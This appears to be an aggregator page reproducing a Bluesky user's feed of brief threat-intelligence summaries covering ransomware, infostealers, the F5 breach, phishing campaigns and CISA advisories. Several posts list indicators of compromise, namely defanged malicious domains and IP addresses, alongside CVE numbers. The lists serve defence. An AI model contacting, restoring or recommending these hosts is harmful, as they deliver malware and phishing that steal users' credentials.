Lightnews — Scholar-powered news

piggo

piggo

@pigondrugs.bsky.social

24 followers 6 following 590 posts

I sheer alpacas and try to defend the internet from malware

Posts Media Videos Starter Packs

piggo @pigondrugs.bsky.social · 2d

~Socket~
ENISA's 2025 report finds AI is fundamentally reshaping the threat landscape, automating phishing and creating new supply chain risks.
-
IOCs: Lumma Stealer, WormGPT, Rafel RAT
-
#AI #ENISA #SupplyChain #ThreatIntel

ENISA 2025: AI Reshapes Cyber Attacks

piggo @pigondrugs.bsky.social · 2d

~Sophos~
Threat actors exploit legacy vulnerabilities and stolen credentials where MFA is absent, fueling a volatile ransomware landscape.
-
IOCs: Qilin, Akira
-
#MFA #Ransomware #ThreatIntel

Threat Intel Report: Ransomware, Stolen Credentials & Legacy Vulns

news.sophos.com

piggo @pigondrugs.bsky.social · 3d

~Zscaler~
Nation-state actor UNC5221 breached F5, exfiltrating BIG-IP source code and internal zero-day vulnerability documentation.
-
IOCs: BRICKSTORM, UNC5221
-
#F5 #ThreatIntel #UNC5221

F5 Discloses Major Security Breach

www.zscaler.com

piggo @pigondrugs.bsky.social · 3d

~Socket~
Vite+ is a new commercial, Rust-based toolchain designed to consolidate the JavaScript development ecosystem.
-
IOCs: (None identified)
-
#JavaScript #ThreatIntel #Vite

Vite+ Unveils Unified JS Toolchain

piggo @pigondrugs.bsky.social · 3d

~Cisa~
CISA has released 13 new advisories detailing vulnerabilities in various ICS products from Rockwell, Siemens, and others.
-
IOCs: (None identified)
-
#CISA #ICS #ThreatIntel

CISA Releases 13 ICS Advisories

piggo @pigondrugs.bsky.social · 3d

~Mandiant~
UNC5142 distributes infostealers (VIDAR, ATOMIC) from compromised WordPress sites using a blockchain technique to store malicious code.
-
IOCs: ratatui[. ]today, browser-storage[. ]com, 80. 64. 30[. ]238
-
...

UNC5142 Uses EtherHiding to Distribute Malware

cloud.google.com

piggo @pigondrugs.bsky.social · 3d

~Mandiant~
DPRK actor UNC5342 is using the EtherHiding technique to deliver JADESNOW & INVISIBLEFERRET malware via public blockchains.
-
...

DPRK Adopts EtherHiding Malware Delivery

cloud.google.com

piggo @pigondrugs.bsky.social · 3d

~Cofense~
Phishing campaign distributes a malicious 'Mac Spoofer' Chrome extension to steal user credentials from login forms.
-
IOCs: hibarriotech. com, reader. hibarriotech. com, 194. 146. 41. 102
-
#Malware #Phishing #ThreatIntel

Malicious 'Mac Spoofer' Browser Extension

https://cofense.com/blog/privacy”-and-prizes”-rewards-from-a-malicious-browser-extension

piggo @pigondrugs.bsky.social · 3d

~Checkpoint~
A vulnerability in a new Rust-based Windows kernel component (win32kbase_rs.sys) allows local users to cause a system crash (BSOD) via a malformed metafile.
-
IOCs: (None identified)
-
#DoS #Rust #ThreatIntel #Windows

Rust Vulnerability in Windows GDI Kernel

research.checkpoint.com

piggo @pigondrugs.bsky.social · 4d

~Trendmicro~
A doxxing campaign against alleged Lumma Stealer (Water Kurita) operators has caused a sharp decline in activity, with customers migrating to alternatives like Vidar and StealC.
-
IOCs: (None identified)
-
...

Lumma Stealer Doxxing Leads to Decline

www.trendmicro.com

piggo @pigondrugs.bsky.social · 4d

~Zscaler~
Threat actors are increasingly exploiting non-web protocols like DNS, RDP, and SMB for covert C2, data theft, and ransomware attacks.
-
IOCs: (None identified)
-
#DNS #RDP #ThreatIntel

Attacks on Non-Web Protocols Increasing

www.zscaler.com

piggo @pigondrugs.bsky.social · 4d

~Sophos~
Microsoft released a record 170 patches, fixing 8 critical issues and 3 zero-days under active exploitation.
-
IOCs: CVE-2025-24990, CVE-2025-47827, CVE-2025-59230
-
#Microsoft #PatchTuesday #ThreatIntel

Microsoft's Record October Patch Tuesday

news.sophos.com

piggo @pigondrugs.bsky.social · 4d

~Sophos~
A nation-state actor breached F5, exfiltrating source code and undisclosed vulnerability data.
-
IOCs: (None identified)
-
#Breach #F5 #ThreatIntel

F5 Network Compromised

news.sophos.com

piggo @pigondrugs.bsky.social · 4d

~Cisa~
CISA added an actively exploited Adobe Experience Manager RCE vulnerability (CVE-2025-54253) to its KEV catalog.
-
IOCs: CVE-2025-54253
-
#Adobe #CVE202554253 #ThreatIntel

CISA Adds Adobe RCE to KEV Catalog

piggo @pigondrugs.bsky.social · 4d

~Trendmicro~
Attackers exploit Cisco SNMP vulnerability CVE-2025-20352 to deploy rootkits, enabling RCE and persistent access.
-
IOCs: CVE-2025-20352
-
#CVE202520352 #Cisco #ThreatIntel

Cisco SNMP Vuln Exploited for Rootkits

www.trendmicro.com

piggo @pigondrugs.bsky.social · 4d

~Socket~
A credential management failure at RubyGems resulted in a former maintainer retaining AWS root access, sparking a major community dispute over the incident's handling.
-
IOCs: (None identified)
-
#CloudSecurity #RubyGems #ThreatIntel

RubyGems Credential Incident Sparks Community Backlash

piggo @pigondrugs.bsky.social · 4d

~Paloalto~
PhantomVAI Loader uses phishing and steganography to deliver multiple infostealers like Katz Stealer, AsyncRAT, and XWorm.
-
IOCs: (None identified)
-
#Infostealer #Malware #PhantomVAI #ThreatIntel

PhantomVAI Loader Delivers Infostealers

unit42.paloaltonetworks.com

piggo @pigondrugs.bsky.social · 4d

~Cisa~
CISA directs federal agencies to patch F5 devices against an imminent threat from a nation-state actor.
-
IOCs: (None identified)
-
#CISA #F5 #ThreatIntel #Vulnerability

CISA Emergency Directive for F5 Devices

piggo @pigondrugs.bsky.social · 5d

~Socket~
Threat actors are using Discord webhooks for C2 and data exfiltration in malicious packages on npm, PyPI, and RubyGems.
-
...

Malicious Packages Use Discord for C2

piggo @pigondrugs.bsky.social · 5d

~Zscaler~
An SEO poisoning campaign distributes a trojanized Ivanti VPN client to steal credentials for a C2 server.
-
IOCs: 4. 239. 95. 1, netml. shop, shopping5. shop
-
#Ivanti #SEOpoisoning #ThreatIntel

SEO Poisoning Targets Ivanti VPN Users

www.zscaler.com

piggo @pigondrugs.bsky.social · 5d

~Elastic~
Elastic details its nightMARE library for malware analysis, demonstrating C2 extraction from Lumma Stealer.
-
IOCs: mocadia. com, mastwin. in, ordinarniyvrach. ru
-
#Lumma #MalwareAnalysis #ThreatIntel

Elastic's nightMARE Malware Analysis Library

piggo @pigondrugs.bsky.social · 5d

~Cisa~
CISA adds five actively exploited vulnerabilities affecting Microsoft Windows, Rapid7, IGEL OS, and SKYSEA to its KEV catalog.
-
IOCs: CVE-2025-6264, CVE-2025-24990, CVE-2025-59230
-
#CISA #KEV #PatchNow #ThreatIntel

CISA Adds 5 CVEs to KEV Catalog

piggo @pigondrugs.bsky.social · 5d

~Cisa~
CISA released an advisory for the Rockwell Automation 1715 EtherNet/IP Comms Module (ICSA-25-287-01).
-
IOCs: (None identified)
-
#ICS #RockwellAutomation #ThreatIntel

CISA ICS Advisory: Rockwell Automation

piggo @pigondrugs.bsky.social · 5d

~Cofense~
Phishing campaign uses Microsoft branding and fake browser-locking alerts to lure victims into fraudulent tech support calls.
-
IOCs: 107. 180. 26. 155, 184. 168. 97. 153, deprivy. stified. sbs
-
#Phishing #TechSupportScam #ThreatIntel

Microsoft Logo Used in Tech Support Scams

piggo @pigondrugs.bsky.social · 6d

~Sekoia~
A new TLS-based backdoor, PolarEdge, is being deployed on QNAP, Asus, and Synology devices by exploiting CVE-2023-20118.
-
IOCs: CVE-2023-20118
-
#Backdoor #CVE202320118 #PolarEdge #ThreatIntel

PolarEdge Backdoor Analysis